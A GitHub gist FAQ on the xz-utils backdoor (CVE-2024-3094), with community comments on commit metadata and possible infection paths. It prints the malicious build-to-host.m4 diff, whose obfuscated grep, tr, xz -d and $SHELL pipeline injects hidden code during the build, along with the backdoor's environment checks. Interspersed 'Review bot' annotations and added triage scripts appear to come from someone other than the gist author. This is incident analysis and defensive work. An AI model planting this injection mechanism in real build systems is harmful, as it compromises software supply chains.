@thesamesam
Last active January 2, 2025 15:08
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith to be accurate, but, to be clear, we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; statistically, your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known, specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild, where it gets activated by connections, resulting in performance issues, but we do not know yet what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh is vulnerable, but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.
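As an added example (not code from the gist), here is a small POSIX shell triage script that checks a host against the conditions listed above: an affected xz/liblzma release, glibc, and an sshd that pulls liblzma into its process through libsystemd. The sshd path /usr/sbin/sshd is the one the gist names; the verdict strings and probing logic are mine.

```shell
#!/bin/sh
# Added triage helper; not part of the gist. It probes the conditions the gist
# lists (xz/liblzma 5.6.0 or 5.6.1, glibc, sshd -> libsystemd -> liblzma) and
# prints "unknown" for anything it cannot determine. The sshd path below is the
# one the gist names; a distro may install sshd elsewhere.

# 0 (true) when the version string is one of the two backdoored releases.
xz_version_affected() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Pull the version out of `xz --version` output, whose first line looks like
# "xz (XZ Utils) 5.6.1". Prints nothing if that line does not match. Note that
# only the library may be installed; then check the liblzma package instead.
parse_xz_version() {
    printf '%s\n' "$1" | sed -n '1s/^xz (XZ Utils) \([0-9][0-9.]*\).*/\1/p'
}

# Does the dynamic loader report glibc? IFUNC, which the hook relies on, is a
# glibc feature. Prints yes, no or unknown.
libc_is_glibc() {
    out=$(ldd --version 2>/dev/null | head -n 1) || out=""
    case "$out" in
        "")                   echo unknown ;;
        *GLIBC*|*"GNU libc"*) echo yes ;;
        *)                    echo no ;;
    esac
}

# Does the sshd binary's dependency closure contain liblzma? ldd resolves
# transitive dependencies, which is exactly the indirect path the gist
# describes (sshd -> libsystemd -> liblzma). Prints yes, no or unknown.
sshd_pulls_liblzma() {
    sshd="${1:-/usr/sbin/sshd}"
    [ -x "$sshd" ] || { echo unknown; return; }
    libs=$(ldd "$sshd" 2>/dev/null) || { echo unknown; return; }
    case "$libs" in
        *liblzma*)
            case "$libs" in
                *libsystemd*) echo "yes (via libsystemd)" ;;
                *)            echo yes ;;
            esac ;;
        *) echo no ;;
    esac
}

# Combine the findings into a single verdict, following the gist's priorities.
# Arguments: version, glibc (yes/no/unknown), sshd liblzma (yes.../no/unknown).
verdict() {
    ver="$1"; glibc="$2"; sshd_lz="$3"
    if [ -z "$ver" ] || [ "$ver" = unknown ]; then
        echo "xz version unknown: check the installed xz/liblzma package version"
    elif ! xz_version_affected "$ver"; then
        echo "not an affected xz release"
    elif [ "$glibc" = no ]; then
        echo "affected release on a non-glibc system: the IFUNC trigger path does not apply, update anyway"
    else
        case "$sshd_lz" in
            yes*) echo "affected release and sshd loads liblzma: update immediately" ;;
            *)    echo "affected release: update immediately, sshd linkage not confirmed" ;;
        esac
    fi
}

# Probe the local host and print a short report.
triage() {
    ver=""
    if command -v xz >/dev/null 2>&1; then
        ver=$(parse_xz_version "$(xz --version 2>/dev/null)")
    fi
    glibc=$(libc_is_glibc)
    lz=$(sshd_pulls_liblzma)
    echo "xz version:         ${ver:-unknown}"
    echo "glibc:              $glibc"
    echo "sshd loads liblzma: $lz"
    echo "verdict:            $(verdict "${ver:-unknown}" "$glibc" "$lz")"
}

triage
```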

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different from the automatically generated ones on GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
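
Review bot: the only change in this hunk is the serial going from 3 to 30, and a vendored gnulib macro should never jump serials without a matching upstream change; because aclocal --install replaces a local copy only when the system copy has a higher serial, an inflated serial keeps this modified file from being overwritten by the legitimate one, so the review action is to diff the file byte-for-byte against gnulib's build-to-host.m4 rather than trust the serial.
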
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
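
Review bot: `gl_[$1]_prefix` is derived here by deleting everything up to the last dot in `$gl_am_configmake`, which turns a file extension into what is later executed as `$gl_[$1]_prefix -d` in the next hunk (for a file ending in `.xz`, the decompressor); nothing in the macro's stated purpose, translating a build-syntax path into host syntax, calls for deriving a command name from a file name the macro located itself, and that alone should block the change in review.
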
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
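
Review bot: the comments in this hunk do not describe the code. `gl_am_configmake` is not a search for "Automake-defined pkg* macros": it greps the whole `$srcdir` tree for any file containing four `#`, five alphanumerics and four `#` at end of line, and the matched file is then run through `sed`, `eval $gl_path_map` (a `tr` that swaps tabs with spaces and `-` with `_`) and `$gl_[$1]_prefix -d`, with the output handed to `$SHELL` from `AC_CONFIG_COMMANDS` when config.status runs. Every stage discards stderr with `2>/dev/null`, and the `_LT_TAGDECL` lines persist these variables into libtool with no explanation. The reviewer action is to reject the hunk and, more generally, to require that the configure macros in a release tarball be regenerated from the tagged sources rather than accepted as shipped.
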

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is just unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a stray "." in the CMake check for landlock sandboxing support. This caused the check to always fail, so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either by themselves, or because changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt, but I am listing some examples here which have already been linked widely, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@imelon123

imelon123 commented Apr 1, 2024

@thesamesam To be honest, here I'm not really interested in what was committed, but rather about the timezone and timestamps, especially the following one:

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <[email protected]>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

I don't think it was a commit triggered from account 'Lasse Collin', as there were no other events at the same timestamp. In that case, it should be from account Jia Tan itself. This raises the question, why did Jia Tan change his timezone to +300?

@thesamesam
Author

thesamesam commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer). It's been covered how the time might change to Lasse's when applying a patch from someone else.

EDIT: xry111 rightly points out in https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007558#gistcomment-5007558 that the pusher may be a third person and this isn't represented in git metadata.

@ItzSwirlz

@x1done daylight savings?

@xry111

xry111 commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer).

Both the author and the committer are Jia Tan:

$ git show 3d1fdddf92321b516d55651888b9c669e254634e --format=fuller | head
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <[email protected]>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <[email protected]>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

    Docs: Document the configure option --disable-ifunc in INSTALL.

diff --git a/INSTALL b/INSTALL
index 7fb41fa6..b64c56c5 100644

But the person who pushed this commit is allowed to be neither author nor committer. (I.e. it may happen that A authored the change, B committed the change, and C pushed the change.)

It's not possible to find the person who pushed the commit with the git CLI. AFAIK there is some GitHub API to figure out when and who pushed a commit. However the repo is under suspension, and even if it weren't, I still don't know if this approach would work when the GitHub repo is only a mirror.

@thesamesam
Author

thesamesam commented Apr 1, 2024

Yes, you're absolutely right. The person who pushed it may be a third person which isn't represented in the commit metadata.

EDIT: I will edit my earlier comment and link to that.

@imelon123

imelon123 commented Apr 1, 2024

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

@thesamesam In the scenario (as xry111 has explained) on 2024-02-12, I guess there should be multiple events from both accounts at the same time. However, with this one, there is only a single event at that time.

@AdrianBunk

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me).
+0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk

AdrianBunk commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@thesamesam

https://github.com/hansjans162
Some token activity elsewhere around the xz pull request, and then never seen again.

In Debian it was nearly 2 years later not only this one (and only) bug report requesting the upgrade to 5.6.1, a few days earlier this "person" also created a (now blocked) new user in the Debian git that had the same pattern of some token activity in other projects while also pushing the upgrade to 5.6.1 right after creating the account:
https://web.archive.org/web/20240330080632/https://salsa.debian.org/hjansen
https://salsa.debian.org/debian/xz-utils/-/merge_requests/1

Can you find any other traces of this "person"?

(EDIT: restored after mistakenly "Update comment" instead of a new comment for my next one)

@thesamesam
Author

thesamesam commented Apr 1, 2024

@AdrianBunk The only thing I've seen pointed out is https://marc.info/?w=2&r=1&s=hans+jensen&q=a but when I took a brief look, it looked like they were not the same person. I will of course keep an eye out...

EDIT: Note that xz-devel is not currently on marc, but I believe the marc people want to get it imported. I should also say questions are welcome - feel free to keep throwing them. I can't reply to every single one, especially if they're more.. out there, but yours have been totally fine & worth answering.

@gh-markt

gh-markt commented Apr 1, 2024

Has anyone documented how this exploit may be done without systemd?

@thesamesam
Author

thesamesam commented Apr 1, 2024

@gh-markt I'm going to update the gist on this today, but TL;DR: all suggested paths I've seen wouldn't work AFAIK because they rely on PAM modules which load too late.

(Of course, if the payload were different, that would be another story, but talking about what we have.)

@AdrianBunk

Immediately after 5.6.1 was due to the pushing by "Hans Jansen " in Debian unstable, "Jia Tan" requested a freeze exception in Ubuntu so that it gets into the upcoming LTS (that should be released later this month):
https://tracker.debian.org/news/1515323/accepted-xz-utils-561-1-source-into-unstable/
https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417

@makotom

makotom commented Apr 1, 2024

In case this makes any bit of help somehow: https://twitter.com/m61k/status/1774614747553620478
tl;dr - I didn't see the if clause (pasting it below for convenience) as a clue that it targets only glibc-based systems on AMD64, unlike the explanation in the Design section.

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

Apologies if it's a false alarm!

@Artoria2e5

Artoria2e5 commented Apr 1, 2024

@makotom Hm. Indeed. The build variable is extracted through eval $(grep ^build=\'x86_64 config.status) (backticks replaced with $(), because i can't markdown), so we should ask autoconf about it.

In autoconf, build is what the --build option eventually gets set to (check general.m4, there's a bit that says build=$build_alias later). The --build option is "the machine you are building on", defaulting to whatever config.guess finds.


Now the if line. Let's replace the grep with just (true) and (false), so we can see that the expression is the same as

if (! (something ^x86_64)) && (something linux-gnu$); then

There is an illusion of choice here: recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64. so we have three possibilities:

  1. build is not set, because build machine is not x86_64. both parts are false, so true && false is false... no exit.
  2. build is x86_64somethinglinux-gnu. first part is true, second part is true. with negation, we get false && true... no exit.
  3. build is x86_64, but does not end with linux-gnu. first true, second false, exit.

... what? none of this makes sense. Considering the bad version of the crc code is supposed to be only x86_64, we should have seen loads of issues when people compile on a non-x64 machine. or when they cross compile. Maybe something else down the line prevents the wrong-architecture object from being linked?


Yikes, we have two scripts in one, the top-level if and the elif. The if is the part that does things to the Makefile, the elif is the part that does stuff to objects.

Maybe the $CC invocation will detect the architecture mismatch, and 2>/dev/null successfully handles it, so there's no issue with cross compile? (Would still go bonkers at runtime for when host is either (x64 && glibc) or (non-x64), target is (x64 && !glibc), but that's probably too rare.)

I don't know.
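To make the precedence point concrete, here is an added shell illustration (not code from the gist or from this comment) that evaluates the quoted `if` condition, exactly as written, for a few constructed build triplets, and emulates the `eval $(grep ^build=\'x86_64 config.status)` extraction that precedes it. It also shows, for comparison, the "x86_64 AND linux-gnu" reading the gist's bullets describe.

```shell
#!/bin/sh
# Added illustration; not code from the gist or its comments. It only evaluates
# the quoted condition for sample inputs and prints a truth table.

# Emulate the extraction step: only a config.status line that starts with
# build='x86_64 is eval'd, so $build stays empty for any other build triplet.
# $1 is constructed config.status text.
extract_build() {
    build=""
    eval "$(printf '%s\n' "$1" | grep "^build='x86_64")"
    printf '%s\n' "$build"
}

# The condition exactly as the script writes it. `!` negates only the first
# parenthesised pipeline; that result is then ANDed with the second pipeline.
# Returns 0 when the `then` branch would be taken.
cond_as_written() {
    build="$1"
    if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); then
        return 0
    fi
    return 1
}

# The reading "x86_64 AND linux-gnu" from the gist's bullets, for comparison.
# Returns 0 when both properties hold.
cond_both_hold() {
    build="$1"
    if (echo "$build" | grep -Eq "^x86_64") && (echo "$build" | grep -Eq "linux-gnu$"); then
        return 0
    fi
    return 1
}

# Print one truth-table row for a triplet (an empty string models "build unset").
row() {
    if cond_as_written "$1"; then w=then; else w=skip; fi
    if cond_both_hold "$1"; then b=yes; else b=no; fi
    printf '%-28s as_written=%-4s x86_64_and_linux_gnu=%s\n' "'$1'" "$w" "$b"
}

# Constructed sample triplets, plus the unset case produced by the grep filter.
for t in x86_64-pc-linux-gnu x86_64-pc-linux-musl aarch64-unknown-linux-gnu ""; do
    row "$t"
done

# What the extraction step yields for a constructed config.status line.
for line in "build='x86_64-pc-linux-gnu'" "build='aarch64-unknown-linux-gnu'"; do
    printf 'config.status %-36s -> build=%s\n' "$line" "'$(extract_build "$line")'"
done
```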

@imelon123

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was committed by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <[email protected]>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <[email protected]>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

@viccie30

viccie30 commented Apr 1, 2024

Lennart Poettering's remarks about libselinux linking liblzma are apparently true, but that dependency is apparently an error: https://www.openwall.com/lists/oss-security/2024/03/31/12

@thesamesam
Author

thesamesam commented Apr 1, 2024

@viccie30 Someone else has just pointed this out to me - thanks to both of you. I'll update things shortly.

Really pleased to have this clarification, as it made little sense to me until now, as I couldn't find a trace of liblzma/xz in libselinux (I only grepped the latest tarball & used gh search though, didn't go so far as cloning their repo and grepping history). It was on my list to look into.

@viccie30

viccie30 commented Apr 1, 2024

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker. --> Are we confident your theory can explain the following? "Jia Tan" authored with a +0300 timezone and "Jia Tan" committed with a +0800 timezone? Note - it was committed by account "Jia Tan" with +0800 timezone, not Lasse with +300 timezone.

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <[email protected]>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <[email protected]>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@AdrianBunk

@x1done

@ItzSwirlz I can not think of any of the +800 countries, such as CN/SG/MY, use daylight saving time, and it can't be +300.

Lasse is living in Finland (like me). +0300 is Finnish summer time.
It is obvious that it was Lasse who applied these patches/commit, including ones that were written by the attacker.

@AdrianBunk Sorry, as mentioned I am not familiar with coding, so I might be wrong. And I don't want to spam the thread. However, I believe we shouldn't ignore anything "suspicious" as it might lead us to what had happened, unless we can reproduce it or are confident enough to rule out its suspicious nature.

@x1done Everyone in this discussion except you agrees that this is not suspicious, why are you wasting everyone's time by spamming this thread with repeating the same again and again and again and again?

@imelon123

Anyone can put whatever name, date, or message they want in a commit. I can push a commit made 2 years in the future in a different timezone authored by Henry Kissinger and committed 3 years ago by Pol Pot if I want to.

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@AdrianBunk

@viccie30 good, technically one can. but then what's the point Jia Tan deliberately changing his timezone to +300 before his commit? It doesn't make sense to me, especially considering that he was using +800 most of the time.

@x1done This has already been explained to you multiple times.

Everyone else in this thread would really appreciate if you could just shut up.

@cwegener

cwegener commented Apr 1, 2024 via email

@redcode

redcode commented Apr 1, 2024

The AuthorDate is supposed to be the original date the commit was created, which is usually equal to CommitDate unless you do an amend, force push or rebase, right? So, if the weird timezone was in CommitDate we could conclude that one of those things has happened. The problem is that the one with the suspicious timezone is AuthorDate, that is, the original one, the one that supposedly reflects when Jia Tan created the commit. Am I wrong?

@redcode

redcode commented Apr 1, 2024

It looks suspicious to me at the very least. It looks like evidence that Jia Tan was actually located at a +3 zone, not +8, and that he created that commit with his real timezone (maybe he forgot to use --date to alter the date, or maybe he used another computer or user account where he would have the correct timezone). Something might have happened with that commit, and he tried to fix it, this time using the fake time zone.

@AdrianBunk

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

@duracell

duracell commented Apr 1, 2024

It looks suspicious to me at the very least.

Or it's the thing others already posted. Which is much more likely, because it's exactly what happens if you do rebase or other things, which fits perfectly in the complete process. So if there is no evidence for anything, why would you bring this up? (It's a rhetorical question, please do NOT answer!)

@redcode

redcode commented Apr 1, 2024

@redcode Please stop trying to restart discussing a topic that has already been discussed far too long.

Please read https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007548#gistcomment-5007548 and other posts in this thread that explain why this is not suspicious.

Have you tried what you have posted? because --ignore-date should fake AuthorDate by setting it to CommitDate. Or at least that's what the documentation says.

